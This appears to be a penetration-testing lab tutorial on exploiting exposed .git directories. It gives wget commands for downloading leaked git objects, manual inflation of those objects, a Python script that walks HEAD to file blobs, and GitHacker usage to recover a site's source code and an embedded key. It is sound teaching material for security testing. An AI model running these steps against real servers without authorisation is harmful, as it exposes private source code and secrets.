Git
Git Information Leak
If the web server exposes the .git directory and directory listing is enabled, we can download the whole directory recursively:
wget -r http://www.example.com/.git/
wget mirrors the files under a www.example.com directory, and git commands then work on that copy. For example, to show changes between commits, or between a commit and the working tree:
git diff
With modern URL mapping (i.e. routing that does not map URLs onto the filesystem), these leaks are less and less common, but it is always worth checking for them.
Bypass Restrictions
If directory listing is disabled, wget -r has no index to follow, so we examine the following two files first:
.git/config
.git/HEAD
Access https://www.example.com/.git/config:
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
Access https://www.example.com/.git/HEAD:
ref: refs/heads/master
Access https://www.example.com/.git/refs/heads/master (the reference HEAD points to):
5346cb2290d9918bfaad7318ebcb2498fe5ebe18
Here 53 is a directory name and 46cb2290d9918bfaad7318ebcb2498fe5ebe18 is a file name: git stores each loose object under .git/objects/ in a subdirectory named after the first two hex characters of its SHA-1, with the remaining 38 characters as the file name. The full hash identifies the current commit, so the object lives at .git/objects/53/46cb2290d9918bfaad7318ebcb2498fe5ebe18. Download this commit:
wget https://ptl-8ddb9a66-9a79abff.libcurl.so/.git/objects/53/46cb2290d9918bfaad7318ebcb2498fe5ebe18
Loose objects are zlib-compressed, and there is no standard command-line tool to inflate them, so we use Ruby (any other zlib binding works as well):
$ ruby -rzlib -e 'print Zlib::Inflate.new.inflate(STDIN.read)' < 46cb2290d9918bfaad7318ebcb2498fe5ebe18
commit 199tree 58ace0476093d04023f84d7816adacfa7b879c43
author Louis Nyffenegger <louis@pentesterlab.com> 1652405113 +0000
committer Louis Nyffenegger <louis@pentesterlab.com> 1652405113 +0000
Initial import
The header (commit 199, the object type and size) ends with a NUL byte that the terminal does not display, which is why it runs straight into tree. That tree line gives the hash of the commit's root tree, not of another commit. Download it, inflate it and run strings -a on the result. Tree entries store each 20-byte SHA-1 in binary, so strings drops the hashes and leaves only the modes and file names, plus stray characters such as the s and 3 below that happen to be printable hash bytes:
$ wget https://ptl-8ddb9a66-9a79abff.libcurl.so/.git/objects/58/ace0476093d04023f84d7816adacfa7b879c43
$ ruby -rzlib -e 'print Zlib::Inflate.new.inflate(STDIN.read)' < ace0476093d04023f84d7816adacfa7b879c43 | strings -a
tree 182
40000 css
100644 favicon.ico
s100644 footer.php
3100644 header.php
100644 index.php
We want the hash for each file, so let git parse the tree for us. Create our own git repo:
mkdir hack ; cd hack ; git init
Copy files to it:
$ mkdir -p .git/objects/53 .git/objects/58
$ cp ../46cb2290d9918bfaad7318ebcb2498fe5ebe18 .git/objects/53/
$ cp ../ace0476093d04023f84d7816adacfa7b879c43 .git/objects/58/
Retrieve hashes:
$ git cat-file -p 58ace0476093d04023f84d7816adacfa7b879c43
040000 tree b352dde43705f193d2c1d4e6f6a133321186869f css
100644 blob f303c6a7797f5e7a0d5bd31d39a7149366bbf873 favicon.ico
100644 blob 5adab1a1c52dc009d4f26bbce30dacc4c93eea33 footer.php
100644 blob c3646db7f9c7e6f126c75900fdcce16d50e1da82 header.php
100644 blob 88beb94b5e1fc48e1625c89f892b04bffb58225c index.php
Just to save time, assume that we know the key is inside header.php. Create the object directory (c3, the first two characters of the blob hash) and download the blob into it:
mkdir .git/objects/c3 && wget https://ptl-8ddb9a66-9a79abff.libcurl.so/.git/objects/c3/646db7f9c7e6f126c75900fdcce16d50e1da82 -O .git/objects/c3/646db7f9c7e6f126c75900fdcce16d50e1da82
Examine the source code (git inflates the blob and prints the file content):
git cat-file -p c3646db7f9c7e6f126c75900fdcce16d50e1da82
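The chain just walked by hand (HEAD, ref, commit, tree, blob) as one script. This is an added example, not code from the original page or from PentesterLab: it parses loose objects itself, including the binary tree format that strings mangles, checks each object's SHA-1 and size against what was requested, and runs against a constructed in-memory repository. fetch is any function returning the bytes of .git/<path>; for a real target, wrap urllib.request.urlopen on an assumed base URL such as https://www.example.com/.git/ (the host and file names below are assumptions).

```python
# Added example (not code from the original page): walk a leaked .git from HEAD
# down to the blobs. Loose objects are zlib-compressed "<type> <size>\0<body>";
# a tree body is "<mode> <name>\0" + 20 raw SHA-1 bytes per entry.
import hashlib
import zlib

def object_path(sha):
    """objects/<first two hex chars>/<remaining 38 chars>."""
    return f"objects/{sha[:2]}/{sha[2:]}"

def parse_object(raw, expected_sha=None):
    """Inflate a loose object and split off its header, checking hash and size."""
    data = zlib.decompress(raw)
    if expected_sha and hashlib.sha1(data).hexdigest() != expected_sha:
        raise ValueError("hash mismatch: corrupt or tampered object")
    header, _, body = data.partition(b"\0")  # the NUL the terminal hides
    obj_type, size = header.decode().split(" ")
    if int(size) != len(body):
        raise ValueError("size mismatch: truncated object")
    return obj_type, body

def parse_tree(body):
    """Tree entries as (mode, name, hex sha); the sha is binary on disk."""
    entries, pos = [], 0
    while pos < len(body):
        nul = body.index(b"\0", pos)
        mode, name = body[pos:nul].decode().split(" ", 1)
        entries.append((mode, name, body[nul + 1:nul + 21].hex()))
        pos = nul + 21
    return entries

def parse_commit(body):
    """Commit headers (tree, parent, author, ...); first value of a key wins."""
    headers = {}
    for line in body.split(b"\n\n", 1)[0].decode().splitlines():
        key, _, value = line.partition(" ")
        headers.setdefault(key, value)
    return headers

def resolve_head(fetch):
    """HEAD is "ref: refs/heads/<branch>" or, when detached, a bare hash."""
    head = fetch("HEAD").decode().strip()
    return fetch(head[5:]).decode().strip() if head.startswith("ref: ") else head

def walk_tree(fetch, tree_sha, prefix=""):
    """{path: blob sha} for everything under tree_sha, recursing into dirs."""
    obj_type, body = parse_object(fetch(object_path(tree_sha)), tree_sha)
    if obj_type != "tree":
        raise ValueError(f"{tree_sha} is a {obj_type}, expected a tree")
    files = {}
    for mode, name, sha in parse_tree(body):
        if mode == "40000":  # git stores directory mode without the leading 0
            files.update(walk_tree(fetch, sha, prefix + name + "/"))
        else:
            files[prefix + name] = sha
    return files

def list_head_files(fetch):
    """HEAD -> ref -> commit -> root tree -> {path: blob sha}. fetch(path)
    returns the raw bytes of .git/<path> (HTTP for a real target)."""
    commit_sha = resolve_head(fetch)
    obj_type, body = parse_object(fetch(object_path(commit_sha)), commit_sha)
    if obj_type != "commit":
        raise ValueError(f"{commit_sha} is a {obj_type}, expected a commit")
    return walk_tree(fetch, parse_commit(body)["tree"])

# Constructed sample repository (not a real target) so the walker runs offline.
HEADER_PHP = b"<?php $key = 'constructed-example-key'; ?>\n"

def make_object(obj_type, body):
    """Build a loose object the way git does: hash, then zlib-compress."""
    data = f"{obj_type} {len(body)}".encode() + b"\0" + body
    return hashlib.sha1(data).hexdigest(), zlib.compress(data)

def tree_entry(mode, name, sha):
    return f"{mode} {name}".encode() + b"\0" + bytes.fromhex(sha)

def build_sample_repo():
    """Return {path under .git/: bytes} for a three-file repo with a css/ dir."""
    store = {}
    def put(obj_type, body):
        sha, raw = make_object(obj_type, body)
        store[object_path(sha)] = raw
        return sha
    css = put("blob", b"body { color: red; }\n")
    header = put("blob", HEADER_PHP)
    index = put("blob", b"<?php include 'header.php'; ?>\n")
    css_tree = put("tree", tree_entry("100644", "style.css", css))
    root = put("tree", tree_entry("40000", "css", css_tree)
               + tree_entry("100644", "header.php", header)
               + tree_entry("100644", "index.php", index))
    commit = put("commit", b"tree " + root.encode()
                 + b"\nauthor A <a@example.com> 0 +0000"
                 + b"\ncommitter A <a@example.com> 0 +0000\n\nInitial import\n")
    store["HEAD"] = b"ref: refs/heads/master\n"
    store["refs/heads/master"] = commit.encode() + b"\n"
    return store
```

list_head_files(build_sample_repo().__getitem__) returns the three paths css/style.css, header.php and index.php mapped to their blob hashes, and parse_object on the header.php blob yields the file content directly, the equivalent of git cat-file -p. The hash check matters on a real target: a proxy or WAF returning an error page with a 200 status would otherwise be inflated and misparsed silently.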
GitHacker
GitHacker is a multi-threaded tool that detects whether a site exposes its .git folder and downloads that folder almost completely. It also works when directory listing is disabled.
Installation: pip3 install GitHacker
Usage: githacker --url http://127.0.0.1/.git/ --folder result